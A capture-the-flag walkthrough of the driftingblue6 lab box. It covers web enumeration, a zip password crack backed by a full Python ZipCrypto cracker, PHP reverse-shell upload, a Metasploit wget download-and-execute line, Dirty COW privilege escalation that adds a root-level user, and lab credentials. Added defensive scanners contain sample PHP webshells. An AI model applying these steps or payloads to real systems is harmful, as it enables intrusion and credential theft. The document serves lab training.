
Proving Grounds: driftingblue6 Walkthrough


Machine Stats




I started by running my standard nmap scan.

└─$ nmap -A -T4 -p-
Starting Nmap 7.92 ( ) at 2022-08-30 21:56 EDT
Nmap scan report for
Host is up (0.092s latency).
Not shown: 65534 closed tcp ports (conn-refused)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 71.93 seconds

From this, I see we have a robots.txt entry. With only one entry, I figured it was worth a look.

User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute

Here’s what the site looks like.

Now let’s take a look at /textpattern/textpattern.

It looks like the Textpattern CMS.

I now ran a feroxbuster scan to try to enumerate some directories of interest.

└─$ feroxbuster --url                                                            

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.0
 🎯  Target Url            │
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │
 🏁  Press [ENTER] to use the Scan Management Menu™
200      GET       76l       75w      750c
200      GET      212l     1206w    53656c
200      GET       76l       75w      750c
200      GET        5l       14w      110c
301      GET        9l       28w      324c =>
301      GET        9l       28w      331c =>
301      GET        9l       28w      331c =>
301      GET        9l       28w      330c =>
200      GET      130l      860w     6311c
403      GET       10l       30w      296c
301      GET        9l       28w      336c =>
301      GET        9l       28w      328c =>
301      GET        9l       28w      344c =>
301      GET        9l       28w      340c =>
301      GET        9l       28w      341c =>
301      GET        9l       28w      343c =>
301      GET        9l       28w      342c =>
301      GET        9l       28w      340c =>
301      GET        9l       28w      349c =>
301      GET        9l       28w      344c =>
301      GET        9l       28w      347c =>
301      GET        9l       28w      347c =>
301      GET        9l       28w      351c =>
200      GET       10l       14w      145c
301      GET        9l       28w      344c =>
301      GET        9l       28w      344c =>
200      GET      278l     2491w    15170c
200      GET     2718l     7151w    82294c

It looks like the directories that make up this CMS are browsable. To fingerprint the CMS version and start looking for vulnerabilities to exploit, I browsed to /textpattern/textpattern/setup/themes/four-point-eight/manifest.json, where the theme manifest records the version the site is running.

At this point I attempted several SQLi login bypass payloads against the admin login of this Textpattern instance, without success. Next, I went back to the /robots.txt hint and started enumerating for accessible .zip files.

└─$ gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .zip,.php,.txt                                             
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip,php,txt
[+] Timeout:                 10s
2022/08/30 22:15:14 Starting gobuster in directory enumeration mode
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]  
/robots.txt           (Status: 200) [Size: 110]  
/          (Status: 200) [Size: 179]  
/spammer              (Status: 200) [Size: 179]

Well, this is already looking more interesting. The zip file appears to be encrypted…

└─$ unzip
[] creds.txt password: 
   skipping: creds.txt               incorrect password

So let’s crack it with fcrackzip in dictionary mode (-D, with -p pointing at the wordlist). The -u flag makes it verify each candidate by actually unzipping, which weeds out the false positives that the archive's cheap 12-byte header check lets through.

└─$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt  

PASSWORD FOUND!!!!: pw == myspace4
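The same dictionary attack, written out end to end as an added example for this walkthrough (this is not code from the original post or from fcrackzip). It implements the PKWARE "ZipCrypto" keystream, builds a password-protected archive in memory, and then walks a wordlist the way fcrackzip -D does. The member name creds.txt and the password myspace4 are taken from the box; the file contents and the wordlist are constructed here and are not the real creds.zip.

```python
"""ZipCrypto dictionary attack, end to end (added example, constructed data)."""
import io
import struct
import zipfile
import zlib


def _crc_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_CRCTAB = _crc_table()


class ZipCryptoKeys:
    """PKWARE traditional encryption: three 32-bit keys, stirred first by the
    password bytes and then by every plaintext byte that goes through."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self.update(b)

    def update(self, b: int) -> None:
        self.k0 = (self.k0 >> 8) ^ _CRCTAB[(self.k0 ^ b) & 0xFF]
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRCTAB[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            k = self.k2 | 2
            out.append(c ^ (((k * (k ^ 1)) >> 8) & 0xFF))
            self.update(c)  # the keystream advances on the plaintext byte
        return bytes(out)


def build_zipcrypto_zip(name: bytes, plaintext: bytes, password: bytes) -> bytes:
    """One stored (method 0) entry with general-purpose flag bit 0 set.
    The 12 encrypted bytes in front of the data end in the high byte of the
    CRC: readers decrypt only those 12 bytes to reject a wrong password, so
    1 in 256 wrong guesses survives that check and is only caught by the
    CRC-32 over the whole member."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = bytes(range(11)) + bytes([crc >> 24])
    body = ZipCryptoKeys(password).encrypt(header + plaintext)
    flags, method, mtime, mdate = 1, 0, 0, 0x21  # encrypted, stored, 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, mtime, mdate,
                        crc, len(body), len(plaintext), len(name), 0) + name
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method,
                          mtime, mdate, crc, len(body), len(plaintext), len(name),
                          0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central),
                       len(local) + len(body), 0)
    return local + body + central + eocd


def read_member(archive: bytes, password: bytes) -> bytes:
    """Decrypt and read the first member in full; a wrong password raises
    RuntimeError on the header check or BadZipFile on the CRC."""
    zf = zipfile.ZipFile(io.BytesIO(archive))
    return zf.read(zf.namelist()[0], pwd=password)


def crack_zip(archive: bytes, wordlist):
    """Return the first candidate that decrypts the member, or None.
    Reading the whole member is what fcrackzip's -u achieves by calling
    unzip: a header-check false positive still fails on CRC here."""
    for candidate in wordlist:
        try:
            read_member(archive, candidate)
            return candidate
        except (RuntimeError, zipfile.BadZipFile, zlib.error):
            continue
    return None


# Constructed sample; only the member name and password come from the box.
PLAINTEXT = b"sample line, not the real creds.txt\n"
ARCHIVE = build_zipcrypto_zip(b"creds.txt", PLAINTEXT, b"myspace4")
WORDLIST = [b"123456", b"password", b"myspace1", b"letmein", b"myspace4", b"qwerty"]

if __name__ == "__main__":
    print("PASSWORD FOUND:", crack_zip(ARCHIVE, WORDLIST))
```

ZipCrypto has no work factor, so a rockyou-sized list is seconds of work even in pure Python; an AES-encrypted zip (extra field 0x9901) would need a different tool and a real key-derivation cost per guess.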

And now we have credentials!

└─$ unzip                                              
[] creds.txt password: 
 extracting: creds.txt

└─$ cat creds.txt 

Now we are able to login to the Textpattern CMS.

Once logged in, I found a very useful and thorough diagnostics page at /textpattern/textpattern/index.php?event=diag that dumps a lot of information about the system; among other things it confirms the version number enumerated earlier from the theme manifest.

Textpattern version: 4.8.3 (596bca03a4b32004412499363cecec62)
Last update: 2020-09-13 19:56:06
Site URL:
Admin URL:
Document root: /var/www
$path_to_site: /var/www/textpattern
Textpattern path: /var/www/textpattern/textpattern
Article URL pattern: messy
Production status: testing
Temporary directory path: /tmp
PHP version: 5.5.38-1~dotdeb+7.1
GD Graphics Library: Unavailable
Server timezone: UTC
Server local time: 2022-08-31 02:13:12
Daylight Saving Time enabled?: 0
Automatically adjust Daylight Saving Time setting?: 1
Time zone (GMT offset in seconds): Asia/Baghdad (10800)
MySQL: 5.5.47-0+deb7u1 ((Debian)) 
Database server time: 2022-08-30 21:13:12
Database server time offset: 0 s
Database server timezone: SYSTEM
Database session timezone: SYSTEM
Locale: C
Site / Admin language: en / en
Web server: Apache/2.2.22 (Debian)
Apache version: Apache/2.2.22 (Debian)
PHP server API: apache2handler
RFC 2616 headers: 
Server OS: Linux 3.2.0-4-amd64
Admin-side theme: hive 4.8.3

At this point, I decided to take a look at ExploitDB and located "TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)"; however, I could not get it to work properly.

└─$ python3 mayer lionheart

Software: TextPattern <= 4.8.3
CVE: CVE-2020-XXXXX - Authenticated RCE via Unrestricted File Upload
Author: Michele '0blio_' Cisternino

[*] Authenticating to the target as 'mayer'
Traceback (most recent call last):
  File "/home/xxx/Downloads/", line 122, in <module>
    "_txp_token" : (None, uploadToken), # Token here
NameError: name 'uploadToken' is not defined

So now I will just see if I can find a place to upload a simple PHP reverse shell. I typically use Pentest Monkey’s php-reverse-shell. I found what I was looking for at /textpattern/textpattern/index.php?event=file.

The file upload was successful. I started up a listener with nc.

└─$ nc -nvlp 1337        
listening on [any] 1337 ...

Now to locate the uploaded file. I recalled that my earlier feroxbuster enumeration had uncovered a /files directory.

301      GET        9l       28w      331c =>
301      GET        9l       28w      331c =>
301      GET        9l       28w      330c =>

So going to /textpattern/files…

I clicked the file in the browser, and the shell calls home!

└─$ nc -nvlp 1337        
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 33403
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
 21:35:49 up 58 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
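The shell fired because Textpattern stores Files-panel uploads under /textpattern/files and the web server happily executes .php there. As an added example for this walkthrough (not Textpattern's code), here is the check a defender would run over such an upload directory: flag anything that would execute as PHP, by extension or by content, since hiding <?php inside a file with an image extension is the next thing an attacker tries once a naive extension filter exists. The directory tree it scans is constructed in a temporary directory; the extension list is an assumption about a typical mod_php setup and should be matched against the server's own AddHandler/FilesMatch rules.

```python
"""Scan a CMS upload directory for content that would run as PHP (added example)."""
import os
import re
import tempfile

# Extensions a typical mod_php configuration hands to the PHP engine (assumed list).
EXEC_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
# <?php and <?= are unambiguous; a bare <? is skipped because it matches <?xml.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def scan_uploads(root: str, head: int = 64 * 1024):
    """Return sorted (relative path, reasons) for every suspicious file.
    Only the first `head` bytes are read, enough for a dropped shell."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            ext = os.path.splitext(fn)[1].lower()
            with open(path, "rb") as fh:
                data = fh.read(head)
            reasons = []
            if ext in EXEC_EXT:
                reasons.append("executable extension")
            if PHP_TAG.search(data):
                reasons.append("PHP open tag in content")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def make_sample_tree() -> str:
    """Constructed upload directory: one clean file, an obvious shell, a
    shell hidden behind JPEG magic bytes, and a text file with a .PHP name."""
    root = tempfile.mkdtemp(prefix="txp_files_")
    samples = {
        "report.txt": b"quarterly numbers\n",
        "shell.php": b"<?php system($_GET['cmd']); ?>",
        "logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<?php eval($_POST['x']); ?>",
        "notes.PHP": b"plain text with a misleading extension",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, why in scan_uploads(make_sample_tree()):
        print(f"{rel}: {', '.join(why)}")
```

The content check matters more than the extension check: "logo.jpg" is harmless as long as only .php is executed, but becomes a shell the moment a local file inclusion or an Apache multi-extension quirk (shell.php.jpg) comes into play. The durable fix is to make the upload tree non-executable, for example with mod_php's php_admin_flag engine off scoped to that directory, so that a successful upload is no longer code execution.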

Now I want to hand this reverse shell to Metasploit so I can use exploit/multi/script/web_delivery.


msf6 > use exploit/multi/script/web_delivery

msf6 exploit(multi/script/web_delivery) > set lhost tun0

# after using show targets, I set target to 7 (linux) because the victim machine is a Linux box
msf6 exploit(multi/script/web_delivery) > set target 7

msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/script/web_delivery) > run
[*] Started reverse TCP handler on 
[*] Using URL:
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Y7eZ2p7O --no-check-certificate; chmod +x Y7eZ2p7O; ./Y7eZ2p7O& disown

I switched to the basic nc listener I had and ran the wget command specified by metasploit.

[*]  web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3020772 bytes) to
[*] Meterpreter session 1 opened ( -> at 2022-08-30 22:59:58 -0400

And now we have a meterpreter session.

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions

  Id  Name  Type                   Information                 Connection
  --  ----  ----                   -----------                 ----------
  1         meterpreter x64/linux  www-data @ -> (

Privilege Escalation & Root Flag

I now upload linpeas.

meterpreter > upload /var/www/html/
[*] uploading  : /var/www/html/ ->
[*] Uploaded -1.00 B of 757.53 KiB (0.0%): /var/www/html/ ->
[*] uploaded   : /var/www/html/ ->

Linpeas primarily seemed to return the Linux kernel version as an issue.

OS: Linux version 3.2.0-4-amd64 ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.78-1

As a bonus, I also found database credentials at /var/www/textpattern/textpattern/config.php

cat config.php
$txpcfg['db'] = 'textpattern_db';
$txpcfg['user'] = 'drifter';
$txpcfg['pass'] = 'imjustdrifting31';
$txpcfg['host'] = 'localhost';
$txpcfg['table_prefix'] = '';
$txpcfg['txpath'] = '/var/www/textpattern/textpattern';
$txpcfg['dbcharset'] = 'utf8mb4';
// For more customization options, please consult config-dist.php file.

I also decided to run post/multi/recon/local_exploit_suggester, but neither of the two specified exploits worked for various reasons.

meterpreter > run post/multi/recon/local_exploit_suggester 

[*] - Collecting local exploits for x64/linux...
[*] - 168 exploit checks are being tried...
[+] - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 52 / 52
[*] - Valid modules for session 1:

 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 2   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.

Going back to what linpeas found: because the kernel is 3.2.0, I suspected this machine might be vulnerable to our old friend Dirty COW. I had previously used, and decided to use again, "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)", EDB-ID 40839.

meterpreter > upload /home/xxx/Downloads/40839.c /tmp
[*] uploading  : /home/xxx/Downloads/40839.c -> /tmp
[*] uploaded   : /home/xxx/Downloads/40839.c -> /tmp/40839.c

meterpreter > shell
Process 5244 created.
Channel 143 created.

gcc -pthread 40839.c -o dirty -lcrypt

Please enter the new password: 1234
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f0fdedd6000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:

mmap: 7f0fdedd6000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'coolbreeze'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

We can see that the new user was indeed created successfully.

cat /etc/passwd
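The exploit output above shows what this method leaves behind: a line for user firefart with UID 0 and the password hash written straight into /etc/passwd instead of /etc/shadow. Note also that the second run overwrote /tmp/passwd.bak with the already-modified file, so the backup the exploit tells you to restore from is no longer clean. As an added example for this walkthrough (not part of the original post or of 40839.c), here is the check an incident responder would run over /etc/passwd to spot that artifact. The passwd lines are constructed and the hash is a placeholder; only the firefart line's shape follows the exploit's output.

```python
"""Audit /etc/passwd for the backdoor account a Dirty COW /etc/passwd exploit adds (added example)."""

# Constructed sample; the hash is a placeholder, not a real crypt(3) value.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
firefart:$6$placeholder$placeholderhash:0:0:pwned:/root:/bin/bash
"""

# Values the password field legitimately holds when the hash lives in /etc/shadow.
SHADOWED = {"x", "*", "!", ""}


def audit_passwd(text: str):
    """Return (username, reason) pairs for lines worth a second look.
    Two things give the exploit's account away: a second UID-0 user, and a
    hash sitting in field 2 of /etc/passwd rather than the usual 'x'."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed, {len(fields)} fields"))
            continue
        name, pw, uid, _gid, _gecos, home, _shell = fields
        if not uid.isdigit():
            findings.append((name, f"line {lineno}: non-numeric uid {uid!r}"))
            continue
        if int(uid) == 0 and name != "root":
            findings.append((name, f"line {lineno}: uid 0 account other than root"))
        if pw not in SHADOWED:
            findings.append((name, f"line {lineno}: password hash stored in /etc/passwd"))
        if home == "/root" and name != "root":
            findings.append((name, f"line {lineno}: home directory is /root"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```

On a live system, run the same function over open("/etc/passwd").read() and diff the result against a known-good baseline; the malformed-line branch is there because a race that lands mid-write can also leave a truncated entry.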

When I tried to switch user (su), I got an error.

su firefart
su: must be run from a terminal

Ah right, this is because I need a tty. Since the box has python, I just did this:

python -c 'import pty;pty.spawn("/bin/bash")'

And now we have success! (and root)

su firefart
Password: coolbreeze

firefart@driftingblues:/tmp# cat /root/proof.txt
cat /root/proof.txt